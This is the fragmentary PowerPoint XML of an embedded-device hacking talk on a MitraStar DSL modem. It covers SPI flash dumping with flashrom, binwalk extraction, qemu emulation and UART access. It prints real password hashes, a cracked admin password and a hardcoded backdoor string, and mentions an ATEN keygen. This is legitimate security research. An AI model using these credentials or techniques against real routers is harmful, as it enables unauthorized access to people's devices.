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5" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="275" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="267" r:id="rId14"/>
    <p:sldId id="271" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="297" r:id="rId19"/>
    <p:sldId id="277" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="279" r:id="rId22"/>
    <p:sldId id="280" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="287" r:id="rId25"/>
    <p:sldId id="282" r:id="rId26"/>
    <p:sldId id="283" r:id="rId27"/>
    <p:sldId id="286" r:id="rId28"/>
    <p:sldId id="284" r:id="rId29"/>
    <p:sldId id="285" r:id="rId30"/>
    <p:sldId id="276" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="263" r:id="rId33"/>
    <p:sldId id="26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013C-6948-4D09-B43D-6D501755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01BE1-E074-4319-93EC-78E7DED0A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0684-D8B5-4F35-B295-7A4C564E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AED62-B0C8-4A01-9089-B96A4356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D4D2C-F805-4FE6-A406-CBF15ADA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7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461B-402C-4162-882E-D161ED0C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BEEA1-99F0-4511-95E0-12205E517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63BC3-42A1-4A1B-89F8-AEB6977E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6D339-59D8-49E1-8566-732333F5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54CD-E029-4D4B-9BD9-FA2735EE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6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382E6-5C4B-4DF0-A327-B9B428EA8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68A01-BBFE-418B-BFFF-21B44659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7F20F-229A-45A5-8065-A7109AB0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2111-A8E1-4700-9413-30FC1FCF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A0E2-EB72-4AE9-8869-7F8489A7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0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EB32-FA11-499A-85BB-24256A49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181E5-EB04-41AC-84EE-2C60CCF7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8FCE0-02DE-41CF-BD74-ECAF095B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2B8D5-BEF5-451D-90FF-D91790EA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335F-9E8C-4BB1-AEAA-1721648E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Picture 2" descr="Resultado de imagem para h2hc logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1519EB50-525E-4E4D-8F21-6A9E9EFC3A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868" y="5732585"/>
            <a:ext cx="1690763" cy="1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8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1099-8920-47AE-9C34-73EBB374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A6885-3138-4E0F-8EE7-6FCF74407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AA6FE-7ABF-4C6C-8810-73B217D3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7A2AA-03EC-4CF0-81A5-30383DF6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2AB0-CC99-4017-8FAA-6C0B3990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4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3F4-A7E5-48FB-B3D2-8B92C754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85F5-319C-4CEA-A559-1E68B2BEF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1831B-C50C-4DE2-86AF-C7D560B5F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2DB5C-E2D7-4CE8-8922-C399FB8D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7A032-4E2A-46BE-A94B-2B99507C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6AF64-9892-4418-A6CC-39D63B2D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24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7C78-8C71-4E2B-9357-558DDEB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7EFAD-3551-4042-A2D2-8F865DA64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17354-FCA7-4649-99B9-66A1A64D7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C096-703F-4D59-89A1-98BA735A7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529A0-E38B-4C80-B01D-33A456173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6698-74C7-4465-8DE0-E472E352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A2D1BB-FEFB-44F3-BB39-89F5D4C5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0EE239-4333-420B-8A6D-D39FA8B9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65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2A52-35E3-4342-BA00-D4D09F1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BEFF0-9CC8-42C3-956A-9E17A343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1FA16-1D1C-4B0F-B850-40CF8860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AD5E0-3DD0-4BB7-B60F-D6E31F3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56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026F4-4142-4372-A2CD-B064CCB2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D4407-7EFE-4187-A05F-F7BC1D97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DDD30-4EB4-4230-9E1D-AA9C66F1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81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33CA-2872-4E89-90C8-84CACB21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C92F-EA23-4557-AF84-BE68B890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9B27F-4969-48FC-9C50-13C45185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38E64-F05C-453D-8479-506F4ED5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AEE04-3DBE-47F4-9E1C-1A258A7A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554B7-A087-4B0A-B35D-D557A8F9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4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8B7D-8435-46A8-8B73-236355E1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7A144-F916-466F-A334-77F4E3A4C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75223-8A48-4E65-A0F8-62E662E74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5E98A-9DD1-4A53-9048-16CF1FC7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8743E-94C1-4604-8994-C8848CD3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94E5F-43DC-4736-A599-FE138304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42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9F0CF-0074-4B0C-8A6B-F906DE26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DC1D-8107-4A03-92BB-43CCA1275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CBB9-4E40-4ACF-917E-4402B537C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A6906-67EA-4FFD-A97E-5F1C63C7CCE9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78FC-9B1B-431E-B921-A8CB86C98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32083-6CBF-4E65-AE91-BA2755A7D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1D7D3-84D9-439C-8AFF-C0F8A055F3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90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lashrom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h2hc logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D386CAC-C4B6-47C0-8D1B-CB64DC9D4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50305" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-687587" y="10"/>
            <a:ext cx="873430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B3F9D-8127-4FD3-AB01-D1DF5064C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0" y="2800969"/>
            <a:ext cx="3918782" cy="2203873"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Internet of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>*t</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Hacking Embedded Devices</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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D0E7E-A837-4726-B202-4CC875075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51819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Maycon Vitali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>maycon at hacknroll dot com</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1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8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FAF9-2984-45D2-B053-182A9EBA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Sniffing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2" descr="Captura de tela">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49D4607D-0080-4925-9263-C1CA0A8FA9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1581594"/>
            <a:ext cx="6553545" cy="37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4A0D8C-2E48-403F-A221-14532CD8BDEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655721" y="3991935"/>
            <a:ext cx="3657600" cy="51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</a:rPr>
              <a:t>Firmware Upgrade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9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14AE3-A022-4DAF-8CCB-792879C4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SPI Extraction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236375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E3670-EA6B-4C0D-AE89-9D464273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SPI Extraction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Placa interna">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E5B464-5CD8-442C-9E0D-878FA82E5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r="3679" b="2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5192236" y="492573"/>
            <a:ext cx="6476717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emÃ³ria Flash MX25L12835F">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E0635E-76F5-485D-ADEF-03F5FBA04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5" t="16294" r="33633" b="13280"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7485120" y="1056446"/>
            <a:ext cx="2281563" cy="2237170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F9D4A7E-E2FA-4BCF-8EF3-A1BE31D272EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6809175" y="3240348"/>
            <a:ext cx="711457" cy="69245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6A8775-D32F-4C5D-A4B7-781E25F1E780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6853565" y="1695636"/>
            <a:ext cx="711457" cy="174224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917049-8C16-43E4-AC7B-9E4C3A257A2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7325556" y="3240348"/>
            <a:ext cx="1729667" cy="6695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08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EBA6-631F-4A98-97F2-7C684479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Target</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="Modem MITRASTAR DSL-100HN-T1-NV (VIVO)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC8C767-B4F0-471F-A83A-0E28172DC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578" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4639045" y="0"/>
            <a:ext cx="7552955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BBDC2-0AE1-438D-B490-5D148164A135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317937" y="2305869"/>
            <a:ext cx="4151789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ZHAL&gt; ATSH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FW   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: V1.13(WUK.0)b6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External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: BR_SO_V1.13(WUK.0)b6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Bootbase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: V1.10 | 01/18/2016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Vendor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  :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MitraStar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Technology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Corp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: DSL-100HN-T1-NV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Serial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: ACC6629493C0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First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MAC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: ACC6629493C0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Last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MAC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: ACC6629493C3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MAC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Quantity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: 04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Default Country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Code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: D0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Boot Module Debug Flag : 00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Kernel  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: d831a525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RootFS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: a4b2b045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RomFile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: daa5645d</a:t>
            </a:r>
          </a:p>
          <a:p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Bits      : 00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419744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B3D0-2E72-41F8-B143-5AB94EDB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1850271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>SPI Pinout</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="4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1266" name="Picture 2" descr="Pinagem da Flash MX25L12835F">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F47A13DB-07AC-4420-B1CF-D922930E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8" y="1012434"/>
            <a:ext cx="6742647" cy="44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1BE4-7454-408D-9AA8-37BD59F21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350" y="2811780"/>
            <a:ext cx="3219450" cy="3060053"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>CS – Chip Select</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>SI – Serial In</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>SO – Serial Out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>SCLK - Clock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>RESET# - Reset (not used)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>VCC – Power-supply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>GND - Ground</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="16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751993C-EFC0-454B-95BC-623E01E15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87900"/>
            <a:ext cx="156164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050" dirty="0"/>
              <a:t>MX25L12835F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Datasheet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2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0C49A-99E1-4F9A-B20B-07895776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BusPirate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12306" name="Picture 2" descr="BusPirate conectado na memÃ³ria Flash">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2868FB08-300B-4DDD-8CD4-E6A6702E1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886" b="20932"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="444662" y="1589780"/>
            <a:ext cx="6553545" cy="36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D20A-2AB9-44AF-9E40-40DB249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 err="1"/>
              <a:t>flashrom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66A3-C815-4A03-865D-13E8F9D1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AE60A0-4D3E-4FF0-AA13-CA18BE2F4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29" y="1690688"/>
            <a:ext cx="11328742" cy="3754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maycon@DayOfDevil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~]$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flashrom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4BF7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buspirate_spi:dev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=/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dev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buspirate,spispeed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=1M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4BF75"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c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90A959"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"MX25L12835F/MX25L12845E/MX25L12865E"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4BF75"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-r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flash.dump</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="pt-BR" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D0D0D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flashrom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v0.9.9-r1955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Linux 4.14.7-1-ARCH (x86_64)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="pt-BR" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D0D0D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flashrom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software,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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://flashrom.org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rgbClr val="D0D0D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000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D0D0D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Calibrating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loop... OK.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Macronix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flash chip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90A959"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"MX25L12835F/MX25L12845E/MX25L12865E"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(16384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, SPI)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buspirate_spi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rgbClr val="D0D0D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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Reading flash...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AA759F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>done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09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3880-6804-47E5-B558-BCCFC524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 err="1"/>
              <a:t>binwalk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1679-6AEC-4938-935C-9C06A721A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3559"/>
            <a:ext cx="10515600" cy="553403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-e means [e]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xtrac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files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204CA-5992-4DB8-807D-6EE48566A229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960120" y="1763693"/>
            <a:ext cx="1011326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~]$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binwalk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–e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flash.dump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DECIMAL       HEXADECIMAL     DESCRIPTION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--------------------------------------------------------------------------------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26112         0x6600          LZMA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compressed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data,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properties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0x5D, ...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69600         0x10FE0         LZMA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compressed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data,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properties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0x5D, ...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197120        0x30200         LZMA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compressed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data,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properties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0x5D, ...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1372293       0x14F085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filesystem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little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endian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4.0, ...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8389120       0x800200        LZMA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compressed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data,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properties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0x5D, ...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9564293       0x91F085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filesystem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little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endian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4.0, ...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47555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1F8C-094E-4835-8165-DFDE36D0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Emulation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7984-AFE7-41A2-A205-B16D383B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499-A04A-40CF-934D-A2BD9FC011D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960120" y="1763693"/>
            <a:ext cx="1011326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file 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symbolic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link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file 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ELF 32-bit MSB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executable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MIPS, MIPS32 rel2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1 (SYSV),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dynamically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linked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interpreter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lib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/ld-uClibc.so.0,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stripped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84FAB-0FBD-482C-93D8-E88DD8BD57D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960120" y="1794045"/>
            <a:ext cx="1011326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file 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symbolic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link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file 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busybox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ELF 32-bit MSB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executable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MIPS, MIPS32 rel2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1 (SYSV),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dynamically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linked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interpreter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lib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/ld-uClibc.so.0,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stripped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76068-9C84-4289-BA07-17EC05F4827C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960120" y="3695346"/>
            <a:ext cx="1011326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cp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$(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which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qemu-mips-static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) .                                        </a:t>
            </a:r>
          </a:p>
          <a:p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qemu-mips-static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     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rwxr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-x 1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3289936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Feb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19 03:47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qemu-mips-static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                  </a:t>
            </a:r>
          </a:p>
          <a:p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-root]$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chroot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. ./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qemu-mips-static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bin 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sys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boaroot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lib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qemu-mips-static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var</a:t>
            </a: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dev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linuxrc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sbin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userfs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0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E0BDF-34AA-4958-BDFE-2A333968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434278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Serial Interface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UART</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356011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84A6-50DB-4DCE-9347-0A544E5F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CE05-6128-4BBE-B123-0ED0A5463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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Toolset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firmware Extraction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Serial Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UBNT Findings – CVE-2017-093[2-5]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conclusion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441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2" descr="DSL-100HN-T1-NV - Placa Interna">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA9CF534-55BF-47ED-9243-AA1B8AF74F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5" b="145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A727C-AD91-4F93-AC73-8AC0835B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UART Interface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7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onversor USB-TTL">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B550CBA-5B9B-4BBB-A743-8AE78E3CA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5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4D08-D3D0-4FE1-BC81-2AABD06A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implescreenrecorder-2018-10-20_10.40.03">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA490B89-AC90-454D-ADBA-5F7A4B10C2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14" y="365125"/>
            <a:ext cx="11289372" cy="5847349"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27763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C17F2-56F4-4571-9D69-5310B539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Reverse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294602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4C1A-E2A3-46D7-8975-3E59A11E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33A7A-A95F-4CAD-B528-FE3F8705C857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358064" y="4524356"/>
            <a:ext cx="1128943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#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cat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&gt; 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passwd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support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:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/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cmdsh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admin:$1$$C1ky1AR55g1vIlMrcvBNM1:0:0:root:/:/bin/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sh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77136-38AC-49FA-903A-5C97FC3711BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358065" y="1690688"/>
            <a:ext cx="11289437" cy="23391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$ ./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john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./_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flash.dump.extracted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squashfs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-root/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passwd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Using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default input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encoding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 UTF-8</a:t>
            </a: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Loaded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1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password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hash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(md5crypt,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crypt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(3) $1$ [MD5 256/256 AVX2 8x3])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Will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4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OpenMP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threads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Press 'q'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Ctrl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-C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abort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almost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any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other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for status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1234             (admin)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1g 0:00:00:00 DONE 2/3 (2017-12-21 20:46) 4.545g/s 24818p/s 24818c/s 24818C/s 123456..larry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Use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the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"--show"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option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to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display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all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of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the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cracked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passwords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reliably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Session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completed</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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8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6DDD9-C980-4129-ADB4-56E934280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2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8C2-6F0F-4CC7-B699-C9D44FD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Reverse Engineering</a:t>
            </a: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7C6603-3C0D-471E-9E1C-9F01C85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264EBB-928C-4506-A636-65592118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-3" b="495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654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8C2-6F0F-4CC7-B699-C9D44FD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Reverse Engineering</a:t>
            </a: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7C6603-3C0D-471E-9E1C-9F01C85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puts(“Password incorrect !”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1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264EBB-928C-4506-A636-65592118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-3" b="495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5FE0E5-CF81-420A-99B3-E6EFE25F4CA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8531441" y="5672831"/>
            <a:ext cx="3258105" cy="92327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1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8C2-6F0F-4CC7-B699-C9D44FD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Reverse Engineering</a:t>
            </a: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7C6603-3C0D-471E-9E1C-9F01C85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puts(“Password incorrect !”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>system(…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1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264EBB-928C-4506-A636-65592118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-3" b="495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D141E9-FC5E-41D6-A317-96D0BA7C6A86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4776187" y="5397624"/>
            <a:ext cx="3258105" cy="92327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55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8C2-6F0F-4CC7-B699-C9D44FD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Reverse Engineering</a:t>
            </a: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7C6603-3C0D-471E-9E1C-9F01C85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puts(“Password incorrect !”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>system(…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(…, “18vudl1b.4”);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264EBB-928C-4506-A636-65592118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-3" b="495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825CBB-8B09-405A-9997-507B39DE51B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8691239" y="2112886"/>
            <a:ext cx="3258105" cy="92327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13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1 person">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3E130B1-CF0A-4011-B098-90C34582E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CF90F-1113-4767-99B1-1D5A2F58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Who am I?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C227-9B5D-47DF-A8DF-73454C02E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Senior Security Consultant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@ SpiderLabs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Security Researcher @ Hack N’ Roll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Main duties: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Web Application Pentest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Network Pentest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Mobile Application Pentest (SL-TT)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ATM Pentest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Embedded Devices Pentest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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="Preview of your QR Code">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BCF1602-A04A-4D35-9EDE-B490FD36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" y="5761969"/>
            <a:ext cx="922075" cy="9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04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0386-83C3-4209-BF3D-80B24F0C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implescreenrecorder-2018-10-19_18.00.46">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53EC1EC6-E7F8-4B6B-B0EC-0BF08A9EAC6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85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034" y="365125"/>
            <a:ext cx="11063931" cy="6127750"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16549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64DD1-5863-4697-A7F4-B3F717B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Bootloader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ATEN Keygen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147757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830B-754B-473B-B2A2-363F7A29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the ATEN algorithm</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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65D90-78D6-45EB-9D22-C863118B4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4" r="23945" b="61317"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743356" y="1860018"/>
            <a:ext cx="10610444" cy="2365754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FF048F-9072-4869-A632-E9E5E4BD8B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="743356" y="4553883"/>
